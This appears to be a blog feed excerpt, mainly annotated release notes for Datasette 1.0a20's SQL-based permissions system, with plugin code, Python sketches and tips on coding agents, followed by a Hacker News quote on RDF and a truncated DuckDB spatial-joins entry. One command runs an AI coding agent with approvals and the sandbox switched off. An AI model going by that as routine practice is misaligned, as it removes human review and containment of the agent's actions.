    &lt;p&gt;&lt;a href="https://docs.datasette.io/en/latest/changelog.html#a20-2025-11-03"&gt;Datasette 1.0a20 is out&lt;/a&gt; with the biggest breaking API change on the road to 1.0, improving how Datasette's permissions system works by migrating permission logic to SQL running in SQLite. This release involved &lt;a href="https://github.com/simonw/datasette/compare/1.0a19...1.0a20"&gt;163 commits&lt;/a&gt;, with 10,660 additions and 1,825 deletions, most of which was written with the help of Claude Code.&lt;/p&gt;


&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#understanding-the-permissions-system"&gt;Understanding the permissions system&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#permissions-systems-need-to-be-able-to-efficiently-list-things"&gt;Permissions systems need to be able to efficiently list things&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#the-new-permission-resources-sql-plugin-hook"&gt;The new permission_resources_sql() plugin hook&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#hierarchies-plugins-vetoes-and-restrictions"&gt;Hierarchies, plugins, vetoes, and restrictions&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#new-debugging-tools"&gt;New debugging tools&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#the-missing-feature-list-actors-who-can-act-on-this-resource"&gt;The missing feature: list actors who can act on this resource&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#upgrading-plugins-for-datasette-1-0a20"&gt;Upgrading plugins for Datasette 1.0a20&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#using-claude-code-to-implement-this-change"&gt;Using Claude Code to implement this change&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#starting-with-a-proof-of-concept"&gt;Starting with a proof-of-concept&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#miscellaneous-tips-i-picked-up-along-the-way"&gt;Miscellaneous tips I picked up along the way&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#what-s-next-"&gt;What's next?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id="understanding-the-permissions-system"&gt;Understanding the permissions system&lt;/h4&gt;
&lt;p&gt;Datasette's &lt;a href="https://docs.datasette.io/en/latest/authentication.html"&gt;permissions system&lt;/a&gt; exists to answer the following question:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Is this &lt;strong&gt;actor&lt;/strong&gt; allowed to perform this &lt;strong&gt;action&lt;/strong&gt;, optionally against this particular &lt;strong&gt;resource&lt;/strong&gt;?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An &lt;strong&gt;actor&lt;/strong&gt; is usually a user, but might also be an automation operating via the Datasette API.&lt;/p&gt;
&lt;p&gt;An &lt;strong&gt;action&lt;/strong&gt; is a thing they need to do - things like view-table, execute-sql, insert-row.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;resource&lt;/strong&gt; is the subject of the action - the database you are executing SQL against, the table you want to insert a row into.&lt;/p&gt;
&lt;p&gt;Datasette's default configuration is public but read-only: anyone can view databases and tables or execute read-only SQL queries but no-one can modify data.&lt;/p&gt;
&lt;p&gt;Datasette plugins can enable all sorts of additional ways to interact with databases, many of which need to be protected by a form of authentication. Datasette 1.0 also includes &lt;a href="https://simonwillison.net/2022/Dec/2/datasette-write-api/"&gt;a write API&lt;/a&gt;, which needs a way to configure who can insert, update, and delete rows or create new tables.&lt;/p&gt;
&lt;p&gt;Actors can be authenticated in a number of different ways provided by plugins using the &lt;a href="https://docs.datasette.io/en/latest/plugin_hooks.html#actor-from-request-datasette-request"&gt;actor_from_request()&lt;/a&gt; plugin hook. &lt;a href="https://datasette.io/plugins/datasette-auth-passwords"&gt;datasette-auth-passwords&lt;/a&gt;, &lt;a href="https://datasette.io/plugins/datasette-auth-github"&gt;datasette-auth-github&lt;/a&gt;, and &lt;a href="https://datasette.io/plugins/datasette-auth-existing-cookies"&gt;datasette-auth-existing-cookies&lt;/a&gt; are examples of authentication plugins.&lt;/p&gt;
&lt;h4 id="permissions-systems-need-to-be-able-to-efficiently-list-things"&gt;Permissions systems need to be able to efficiently list things&lt;/h4&gt;
&lt;p&gt;The previous implementation included a design flaw common to permissions systems of this nature: each permission check involved a function call which would delegate to one or more plugins and return a True/False result.&lt;/p&gt;
&lt;p&gt;This works well for single checks, but has a significant problem: what if you need to show the user a list of things they can access, for example the tables they can view?&lt;/p&gt;
&lt;p&gt;I want Datasette to be able to handle potentially thousands of tables - tables in SQLite are cheap! I don't want to have to run 1,000+ permission checks just to show the user a list of tables.&lt;/p&gt;
&lt;p&gt;Since Datasette is built on top of SQLite we already have a powerful mechanism to help solve this problem. SQLite is &lt;em&gt;really&lt;/em&gt; good at filtering large numbers of records.&lt;/p&gt;
&lt;h4 id="the-new-permission-resources-sql-plugin-hook"&gt;The new permission_resources_sql() plugin hook&lt;/h4&gt;
&lt;p&gt;The biggest change in the new release is that I've replaced the previous  &lt;code&gt;permission_allowed(actor, action, resource)&lt;/code&gt; plugin hook - which let a plugin determine if an actor could perform an action against a resource - with a new &lt;a href="https://docs.datasette.io/en/latest/plugin_hooks.html#plugin-hook-permission-resources-sql"&gt;permission_resources_sql(actor, action)&lt;/a&gt; plugin hook.&lt;/p&gt;
&lt;p&gt;Instead of returning a True/False result, this new hook returns a SQL query that returns rules helping determine the resources the current actor can execute the specified action against.&lt;/p&gt;
&lt;p&gt;Here's an example, lifted from the documentation:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;from&lt;/span&gt; &lt;span class="pl-s1"&gt;datasette&lt;/span&gt; &lt;span class="pl-k"&gt;import&lt;/span&gt; &lt;span class="pl-s1"&gt;hookimpl&lt;/span&gt;
&lt;span class="pl-k"&gt;from&lt;/span&gt; &lt;span class="pl-s1"&gt;datasette&lt;/span&gt;.&lt;span class="pl-s1"&gt;permissions&lt;/span&gt; &lt;span class="pl-k"&gt;import&lt;/span&gt; &lt;span class="pl-v"&gt;PermissionSQL&lt;/span&gt;


&lt;span class="pl-en"&gt;@&lt;span class="pl-s1"&gt;hookimpl&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-k"&gt;def&lt;/span&gt; &lt;span class="pl-en"&gt;permission_resources_sql&lt;/span&gt;(&lt;span class="pl-s1"&gt;datasette&lt;/span&gt;, &lt;span class="pl-s1"&gt;actor&lt;/span&gt;, &lt;span class="pl-s1"&gt;action&lt;/span&gt;):
    &lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-s1"&gt;action&lt;/span&gt; &lt;span class="pl-c1"&gt;!=&lt;/span&gt; &lt;span class="pl-s"&gt;"view-table"&lt;/span&gt;:
        &lt;span class="pl-k"&gt;return&lt;/span&gt; &lt;span class="pl-c1"&gt;None&lt;/span&gt;
    &lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-c1"&gt;not&lt;/span&gt; &lt;span class="pl-s1"&gt;actor&lt;/span&gt; &lt;span class="pl-c1"&gt;or&lt;/span&gt; &lt;span class="pl-s1"&gt;actor&lt;/span&gt;.&lt;span class="pl-c1"&gt;get&lt;/span&gt;(&lt;span class="pl-s"&gt;"id"&lt;/span&gt;) &lt;span class="pl-c1"&gt;!=&lt;/span&gt; &lt;span class="pl-s"&gt;"alice"&lt;/span&gt;:
        &lt;span class="pl-k"&gt;return&lt;/span&gt; &lt;span class="pl-c1"&gt;None&lt;/span&gt;

    &lt;span class="pl-k"&gt;return&lt;/span&gt; &lt;span class="pl-en"&gt;PermissionSQL&lt;/span&gt;(
        &lt;span class="pl-s1"&gt;sql&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;&lt;span class="pl-s"&gt;"""&lt;/span&gt;
&lt;span class="pl-s"&gt;            SELECT&lt;/span&gt;
&lt;span class="pl-s"&gt;                'accounting' AS parent,&lt;/span&gt;
&lt;span class="pl-s"&gt;                'sales' AS child,&lt;/span&gt;
&lt;span class="pl-s"&gt;                1 AS allow,&lt;/span&gt;
&lt;span class="pl-s"&gt;                'alice can view accounting/sales' AS reason&lt;/span&gt;
&lt;span class="pl-s"&gt;        """&lt;/span&gt;,
    )&lt;/pre&gt;
&lt;p&gt;This hook grants the actor with ID "alice" permission to view the "sales" table in the "accounting" database.&lt;/p&gt;
&lt;p&gt;The SQL query wrapped by the &lt;code&gt;PermissionSQL&lt;/code&gt; object should always return four columns: parent, child, allow (1 or 0), and a reason string for debugging.&lt;/p&gt;
&lt;p&gt;When you ask Datasette to list the resources an actor can access for a specific action, it will combine the SQL returned by all installed plugins into a single query that joins against &lt;a href="https://docs.datasette.io/en/latest/internals.html#internal-database-schema"&gt;the internal catalog tables&lt;/a&gt; and efficiently lists all the resources the actor can access.&lt;/p&gt;
&lt;p&gt;This query can then be limited or paginated to avoid loading too many results at once.&lt;/p&gt;
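&lt;p&gt;To make the idea of combining rule queries concrete, here is a heavily simplified sketch using Python's &lt;code&gt;sqlite3&lt;/code&gt; module. It is not Datasette's actual query: the &lt;code&gt;catalog_tables&lt;/code&gt; schema, the second rule and the "any deny wins" aggregation are all assumptions made for illustration, and it only handles table-level rules:&lt;/p&gt;

```python
import sqlite3

# Hypothetical rule queries, standing in for SQL returned by two plugins.
# Each returns the four columns: parent, child, allow, reason.
RULE_QUERIES = [
    "SELECT 'accounting' AS parent, 'sales' AS child, 1 AS allow, "
    "'alice can view accounting/sales' AS reason",
    "SELECT 'accounting' AS parent, 'payroll' AS child, 0 AS allow, "
    "'payroll is private' AS reason",
]

conn = sqlite3.connect(":memory:")
# Simplified stand-in for the internal catalog tables (assumed schema)
conn.execute("CREATE TABLE catalog_tables (database_name TEXT, table_name TEXT)")
conn.executemany(
    "INSERT INTO catalog_tables VALUES (?, ?)",
    [("accounting", "sales"), ("accounting", "payroll"), ("accounting", "invoices")],
)

# Glue every plugin's rules together, then let SQLite do the filtering
combined = " UNION ALL ".join(RULE_QUERIES)
sql = f"""
WITH rules AS ({combined})
SELECT t.database_name, t.table_name
FROM catalog_tables AS t
JOIN rules AS r
  ON r.parent = t.database_name AND r.child = t.table_name
GROUP BY t.database_name, t.table_name
HAVING MIN(r.allow) = 1
ORDER BY t.database_name, t.table_name
LIMIT 10
"""
allowed = conn.execute(sql).fetchall()
print(allowed)
```

&lt;p&gt;The point of the sketch is that one query produces the whole list, and the &lt;code&gt;LIMIT&lt;/code&gt; clause is where pagination would hook in, rather than running a separate permission check per table.&lt;/p&gt;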
&lt;h4 id="hierarchies-plugins-vetoes-and-restrictions"&gt;Hierarchies, plugins, vetoes, and restrictions&lt;/h4&gt;
&lt;p&gt;Datasette has several additional requirements that make the permissions system more complicated.&lt;/p&gt;
&lt;p&gt;Datasette permissions can optionally act against a two-level &lt;strong&gt;hierarchy&lt;/strong&gt;. You can grant a user the ability to insert-row against a specific table, or every table in a specific database, or every table in &lt;em&gt;every&lt;/em&gt; database in that Datasette instance.&lt;/p&gt;
&lt;p&gt;Some actions can apply at the table level, others the database level and others only make sense globally - enabling a new feature that isn't tied to tables or databases, for example.&lt;/p&gt;
&lt;p&gt;Datasette currently has &lt;a href="https://docs.datasette.io/en/latest/authentication.html#built-in-actions"&gt;ten default actions&lt;/a&gt; but &lt;strong&gt;plugins&lt;/strong&gt; that add additional features can &lt;a href="https://docs.datasette.io/en/latest/plugin_hooks.html#register-actions-datasette"&gt;register new actions&lt;/a&gt; to better participate in the permissions system.&lt;/p&gt;
&lt;p&gt;Datasette's permission system has a mechanism to &lt;strong&gt;veto&lt;/strong&gt; permission checks - a plugin can return a deny for a specific permission check which will override any allows. This needs to be hierarchy-aware - a deny at the database level can be outvoted by an allow at the table level.&lt;/p&gt;
&lt;p&gt;Finally, Datasette includes a mechanism for applying additional &lt;strong&gt;restrictions&lt;/strong&gt; to a request. This was introduced for Datasette's API - it allows a user to create an API token that can act on their behalf but is only allowed to perform a subset of their capabilities - just reading from two specific tables, for example. Restrictions are &lt;a href="https://docs.datasette.io/en/latest/authentication.html#restricting-the-actions-that-a-token-can-perform"&gt;described in more detail&lt;/a&gt; in the documentation.&lt;/p&gt;
&lt;p&gt;That's a lot of different moving parts for the new implementation to cover.&lt;/p&gt;
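&lt;p&gt;The interaction between the hierarchy and vetoes can be sketched in a few lines of plain Python. This is my reading of the rules described above rather than Datasette's implementation: the &lt;code&gt;is_allowed()&lt;/code&gt; function, the tuple format and the "no matching rule means deny" fallback are all assumptions for illustration:&lt;/p&gt;

```python
def is_allowed(rules, database, table):
    """Resolve rules for one table; rules are (parent, child, allow) tuples."""
    # Check levels from most specific to least specific:
    # table level, then database level, then global
    levels = [(database, table), (database, None), (None, None)]
    for parent, child in levels:
        matching = [allow for p, c, allow in rules if p == parent and c == child]
        if matching:
            # Within one level a single deny vetoes any allows
            return all(matching)
    # Assumption: no rule at any level means the action is denied
    return False


rules = [
    (None, None, True),             # global allow
    ("accounting", None, False),    # deny for the whole accounting database
    ("accounting", "sales", True),  # table-level allow outvotes the database deny
    ("hr", "salaries", True),
    ("hr", "salaries", False),      # veto at the same level as the allow above
]

print(is_allowed(rules, "accounting", "sales"))
print(is_allowed(rules, "accounting", "payroll"))
print(is_allowed(rules, "hr", "salaries"))
```

&lt;p&gt;Token restrictions are not modelled here. They would act as an additional filter on top of whatever this resolution step allows.&lt;/p&gt;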
&lt;h4 id="new-debugging-tools"&gt;New debugging tools&lt;/h4&gt;
&lt;p&gt;Since permissions are critical to the security of a Datasette deployment it's vital that they are as easy to understand and debug as possible.&lt;/p&gt;
&lt;p&gt;The new alpha adds several new debugging tools, including this page that shows the full list of resources matching a specific action for the current user:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/datasette-allowed-resources.jpg" alt="Allowed resources. Tabs are Playground, Check, Allowed, Rules, Actions, Allow debug. There is a form where you can select an action (here view-table) and optionally filter by parent and child. Below is a table of results listing resource paths - e.g. /fixtures/name-of-table - plus parent, child and reason columns. The reason is a JSON list for example &amp;quot;datasette.default_permissions: root user&amp;quot;,&amp;quot;datasette.default_permissions: default allow for view-table&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And this page listing the &lt;em&gt;rules&lt;/em&gt; that apply to that question - since different plugins may return different rules which get combined together:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/datasette-rules.jpg" alt="The rules tab for the same view-table question. Here there are two allow rules - one from datasette.default_permissions for the root user and another from default_permissions labelled default allow for view-table." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;This screenshot illustrates two of Datasette's built-in rules: there is a default allow for read-only operations such as view-table (which can be overridden by plugins) and another rule that says the root user can do anything (provided Datasette was started with the &lt;code&gt;--root&lt;/code&gt; option).&lt;/p&gt;
&lt;p&gt;Those rules are defined in the &lt;a href="https://github.com/simonw/datasette/blob/1.0a20/datasette/default_permissions.py"&gt;datasette/default_permissions.py&lt;/a&gt; Python module.&lt;/p&gt;
&lt;h4 id="the-missing-feature-list-actors-who-can-act-on-this-resource"&gt;The missing feature: list actors who can act on this resource&lt;/h4&gt;
&lt;p&gt;There's one question that the new system cannot answer: provide a full list of actors who can perform this action against this resource.&lt;/p&gt;
&lt;p&gt;It's not possible to provide this globally for Datasette because Datasette doesn't have a way to track what "actors" exist in the system. SSO plugins such as &lt;code&gt;datasette-auth-github&lt;/code&gt; mean a new authenticated GitHub user might show up at any time, with the ability to perform actions despite the Datasette system never having encountered that particular username before.&lt;/p&gt;
&lt;p&gt;API tokens and actor restrictions come into play here as well. A user might create a signed API token that can perform a subset of actions on their behalf - the existence of that token can't be predicted by the permissions system.&lt;/p&gt;
&lt;p&gt;This is a notable omission, but it's also quite common in other systems. AWS cannot provide a list of all actors who have permission to access a specific S3 bucket, for example - presumably for similar reasons.&lt;/p&gt;
&lt;h4 id="upgrading-plugins-for-datasette-1-0a20"&gt;Upgrading plugins for Datasette 1.0a20&lt;/h4&gt;
&lt;p&gt;Datasette's plugin ecosystem is the reason I'm paying so much attention to ensuring Datasette 1.0 has a stable API. I don't want plugin authors to need to chase breaking changes once that 1.0 release is out.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://docs.datasette.io/en/latest/upgrade_guide.html"&gt;Datasette upgrade guide&lt;/a&gt; includes detailed notes on upgrades that are needed between the 0.x and 1.0 alpha releases. I've added an extensive section about the permissions changes to that document.&lt;/p&gt;
&lt;p&gt;I've also been experimenting with dumping those instructions directly into coding agent tools - Claude Code and Codex CLI - to have them upgrade existing plugins for me. This has been working &lt;em&gt;extremely well&lt;/em&gt;. I've even had Claude Code &lt;a href="https://github.com/simonw/datasette/commit/fa978ec1006297416e2cd87a2f0d3cac99283cf8"&gt;update those notes itself&lt;/a&gt; with things it learned during an upgrade process!&lt;/p&gt;
&lt;p&gt;This is greatly helped by the fact that every single Datasette plugin has an automated test suite that demonstrates the core functionality works as expected. Coding agents can use those tests to verify that their changes have had the desired effect.&lt;/p&gt;
&lt;p&gt;I've also been leaning heavily on &lt;code&gt;uv&lt;/code&gt; to help with the upgrade process. I wrote myself two new helper scripts - &lt;code&gt;tadd&lt;/code&gt; and &lt;code&gt;radd&lt;/code&gt; - to help test the new plugins.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;tadd&lt;/code&gt; = "test against datasette dev" - it runs a plugin's existing test suite against the current development version of Datasette checked out on my machine. It passes extra options through to &lt;code&gt;pytest&lt;/code&gt; so I can run &lt;code&gt;tadd -k test_name&lt;/code&gt; or &lt;code&gt;tadd -x --pdb&lt;/code&gt; as needed.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;radd&lt;/code&gt; = "run against datasette dev" - it runs the latest dev &lt;code&gt;datasette&lt;/code&gt; command with the plugin installed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;code&gt;tadd&lt;/code&gt; and &lt;code&gt;radd&lt;/code&gt; implementations &lt;a href="https://til.simonwillison.net/python/uv-tests#variants-tadd-and-radd"&gt;can be found in this TIL&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Some of my plugin upgrades have become a one-liner to the &lt;code&gt;codex exec&lt;/code&gt; command, which runs OpenAI Codex CLI with a prompt without entering interactive mode:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;codex &lt;span class="pl-c1"&gt;exec&lt;/span&gt; --dangerously-bypass-approvals-and-sandbox \
&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Run the command tadd and look at the errors and then&lt;/span&gt;
&lt;span class="pl-s"&gt;read ~/dev/datasette/docs/upgrade-1.0a20.md and apply&lt;/span&gt;
&lt;span class="pl-s"&gt;fixes and run the tests again and get them to pass&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There are still a bunch more to go - there's &lt;a href="https://github.com/simonw/datasette/issues/2577"&gt;a list in this tracking issue&lt;/a&gt; - but I expect to have the plugins I maintain all upgraded pretty quickly now that I have a solid process in place.&lt;/p&gt;
&lt;h4 id="using-claude-code-to-implement-this-change"&gt;Using Claude Code to implement this change&lt;/h4&gt;
&lt;p&gt;This change to Datasette core is &lt;em&gt;by far&lt;/em&gt; the most ambitious piece of work I've ever attempted using a coding agent.&lt;/p&gt;
&lt;p&gt;Last year I agreed with the prevailing opinion that LLM assistance was much more useful for greenfield coding tasks than working on existing codebases. The amount you could usefully get done was greatly limited by the need to fit the entire codebase into the model's context window.&lt;/p&gt;
&lt;p&gt;Coding agents have entirely changed that calculation. Claude Code and Codex CLI still have relatively limited token windows - albeit larger than last year - but their ability to search through the codebase, read extra files on demand and "reason" about the code they are working with has made them vastly more capable.&lt;/p&gt;
&lt;p&gt;I no longer see codebase size as a limiting factor for how useful they can be.&lt;/p&gt;
&lt;p&gt;I've also spent enough time with Claude Sonnet 4.5 to build a weird level of trust in it. I can usually predict exactly what changes it will make for a prompt. If I tell it "extract this code into a separate function" or "update every instance of this pattern" I know it's likely to get it right.&lt;/p&gt;
&lt;p&gt;For something like permission code I still review everything it does, often by watching it as it works since it displays diffs in the UI.&lt;/p&gt;
&lt;p&gt;I also pay extremely close attention to the tests it's writing. Datasette 1.0a19 already had 1,439 tests, many of which exercised the existing permission system. 1.0a20 increases that to 1,583 tests. I feel very good about that, especially since most of the existing tests continued to pass without modification.&lt;/p&gt;
&lt;h4 id="starting-with-a-proof-of-concept"&gt;Starting with a proof-of-concept&lt;/h4&gt;
&lt;p&gt;I built several different proof-of-concept implementations of SQL permissions before settling on the final design. My &lt;a href="https://github.com/simonw/research/tree/main/sqlite-permissions-poc"&gt;research/sqlite-permissions-poc&lt;/a&gt; project was the one that finally convinced me of a viable approach.&lt;/p&gt;
&lt;p&gt;That one started as a &lt;a href="https://claude.ai/share/8fd432bc-a718-4883-9978-80ab82a75c87"&gt;free-ranging conversation with Claude&lt;/a&gt;, at the end of which I told it to generate a specification which I then &lt;a href="https://chatgpt.com/share/68f6532f-9920-8006-928a-364e15b6e9ef"&gt;fed into GPT-5&lt;/a&gt; to implement. You can see that specification &lt;a href="https://github.com/simonw/research/tree/main/sqlite-permissions-poc#original-prompt"&gt;at the end of the README&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I later fed the POC itself into Claude Code and had it implement the first version of the new Datasette system based on that previous experiment.&lt;/p&gt;
&lt;p&gt;This is admittedly a very weird way of working, but it helped me finally break through on a problem that I'd been struggling with for months.&lt;/p&gt;
&lt;h4 id="miscellaneous-tips-i-picked-up-along-the-way"&gt;Miscellaneous tips I picked up along the way&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;When working on anything relating to plugins it's vital to have at least a few real plugins that you upgrade in lock-step with the core changes. The &lt;code&gt;tadd&lt;/code&gt; and &lt;code&gt;radd&lt;/code&gt; shortcuts were invaluable for productively working on those plugins while I made changes to core.&lt;/li&gt;
&lt;li&gt;Coding agents make experiments &lt;em&gt;much&lt;/em&gt; cheaper. I threw away so much code on the way to the final implementation, which was psychologically easier because the cost to create that code in the first place was so low.&lt;/li&gt;
&lt;li&gt;Tests, tests, tests. This project would have been impossible without that existing test suite. The additional tests we built along the way give me confidence that the new system is as robust as I need it to be.&lt;/li&gt;
&lt;li&gt;Claude writes good commit messages now! I finally gave in and let it write these - previously I've been determined to write them myself. It's a big time saver to be able to say "write a tasteful commit message for these changes".&lt;/li&gt;
&lt;li&gt;Claude is also great at breaking up changes into smaller commits. It can also productively rewrite history to make it easier to follow, especially useful if you're still working in a branch.&lt;/li&gt;
&lt;li&gt;A really great way to review Claude's changes is with the GitHub PR interface. You can attach comments to individual lines of code and then later prompt Claude like this: &lt;code&gt;Use gh CLI to fetch comments on URL-to-PR and make the requested changes&lt;/code&gt;. This is a very quick way to apply little nitpick changes - rename this function, refactor this repeated code, add types here etc.&lt;/li&gt;
&lt;li&gt;The code I write with LLMs is &lt;em&gt;higher quality code&lt;/em&gt;. I usually find myself making constant trade-offs while coding: this function would be neater if I extracted this helper, it would be nice to have inline documentation here, changing this would be good but would break a dozen tests... for each of those I have to determine if the additional time is worth the benefit. Claude can apply changes so much faster than me that these calculations have changed - almost any improvement is worth applying, no matter how trivial, because the time cost is so low.&lt;/li&gt;
&lt;li&gt;Internal tools are cheap now. The new debugging interfaces were mostly written by Claude and are significantly nicer to use and look at than the hacky versions I would have knocked out myself, if I had even taken the extra time to build them.&lt;/li&gt;
&lt;li&gt;That trick with a Markdown file full of upgrade instructions works astonishingly well - it's the same basic idea as &lt;a href="https://simonwillison.net/2025/Oct/16/claude-skills/"&gt;Claude Skills&lt;/a&gt;. I maintain over 100 Datasette plugins now and I expect I'll be automating all sorts of minor upgrades in the future using this technique.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="what-s-next-"&gt;What's next?&lt;/h4&gt;
&lt;p&gt;Now that the new alpha is out my focus is upgrading the existing plugin ecosystem to use it, and supporting other plugin authors who are doing the same.&lt;/p&gt;
&lt;p&gt;The new permissions system unlocks some key improvements to Datasette Cloud concerning fine-grained permissions for larger teams, so I'll be integrating the new alpha there this week.&lt;/p&gt;
&lt;p&gt;This is the single biggest backwards-incompatible change required before Datasette 1.0. I plan to apply the lessons I learned from this project to the other, less intimidating changes. I'm hoping this can result in a final 1.0 release before the end of the year!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/annotated-release-notes"&gt;annotated-release-notes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/codex-cli"&gt;codex-cli&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="plugins"/><category term="projects"/><category term="python"/><category term="sql"/><category term="sqlite"/><category term="datasette"/><category term="annotated-release-notes"/><category term="uv"/><category term="coding-agents"/><category term="claude-code"/><category term="codex-cli"/></entry><entry><title>Quoting IanCal</title><link href="https://simonwillison.net/2025/Sep/6/iancal/#atom-tag" rel="alternate"/><published>2025-09-06T06:41:49+00:00</published><updated>2025-09-06T06:41:49+00:00</updated><id>https://simonwillison.net/2025/Sep/6/iancal/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://news.ycombinator.com/item?id=45135302#45135852"&gt;&lt;p&gt;RDF has the same problems as the SQL schemas with information scattered. What fields mean requires documentation.&lt;/p&gt;
&lt;p&gt;There - they have a name on a person. What name? Given? Legal? Chosen? Preferred for this use case?&lt;/p&gt;
&lt;p&gt;You only have one ID for Apple eh? Companies are complex to model, do you mean Apple just as someone would talk about it? The legal structure of entities that underpins all major companies, what part of it is referred to?&lt;/p&gt;
&lt;p&gt;I spent a long time building identifiers for universities and companies (which was taken for &lt;a href="https://ror.org/"&gt;ROR&lt;/a&gt; later) and it was a nightmare to say what a university even was. What’s the name of Cambridge? It’s not “Cambridge University” or “The university of Cambridge” legally. But it also is the actual name as people use it. &lt;em&gt;[It's &lt;a href="https://www.cam.ac.uk/about-the-university/how-the-university-and-colleges-work/the-university-as-a-charity"&gt;The Chancellor, Masters, and Scholars of the University of Cambridge&lt;/a&gt;]&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The university of Paris went from something like 13 institutes to maybe one to then a bunch more. Are companies locations at their headquarters? Which headquarters?&lt;/p&gt;
&lt;p&gt;Someone will suggest modelling to solve this but here lies the biggest problem:&lt;/p&gt;
&lt;p&gt;The correct modelling depends on &lt;em&gt;the questions you want to answer&lt;/em&gt;.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://news.ycombinator.com/item?id=45135302#45135852"&gt;IanCal&lt;/a&gt;, on Hacker News, discussing RDF&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/metadata"&gt;metadata&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/hacker-news"&gt;hacker-news&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rdf"&gt;rdf&lt;/a&gt;&lt;/p&gt;



</summary><category term="metadata"/><category term="sql"/><category term="hacker-news"/><category term="rdf"/></entry><entry><title>Spatial Joins in DuckDB</title><link href="https://simonwillison.net/2025/Aug/23/spatial-joins-in-duckdb/#atom-tag" rel="alternate"/><published>2025-08-23T21:21:02+00:00</published><updated>2025-08-23T21:21:02+00:00</updated><id>https://simonwillison.net/2025/Aug/23/spatial-joins-in-duckdb/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://duckdb.org/2025/08/08/spatial-joins"&gt;Spatial Joins in DuckDB&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Extremely detailed overview by Max Gabrielsson of DuckDB's new spatial join optimizations.&lt;/p&gt;
&lt;p&gt;Consider the following query, which counts the number of &lt;a href="https://citibikenyc.com/system-data"&gt;NYC Citi Bike Trips&lt;/a&gt; for each of the neighborhoods defined by the &lt;a href="https://www.nyc.gov/content/planning/pages/resources/datasets/neighborhood-tabulation"&gt;NYC Neighborhood Tabulation Areas polygons&lt;/a&gt; and returns the top three:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt; neighborhood,
  &lt;span class="pl-c1"&gt;count&lt;/span&gt;(&lt;span class="pl-k"&gt;*&lt;/span&gt;) &lt;span class="pl-k"&gt;AS&lt;/span&gt; num_rides
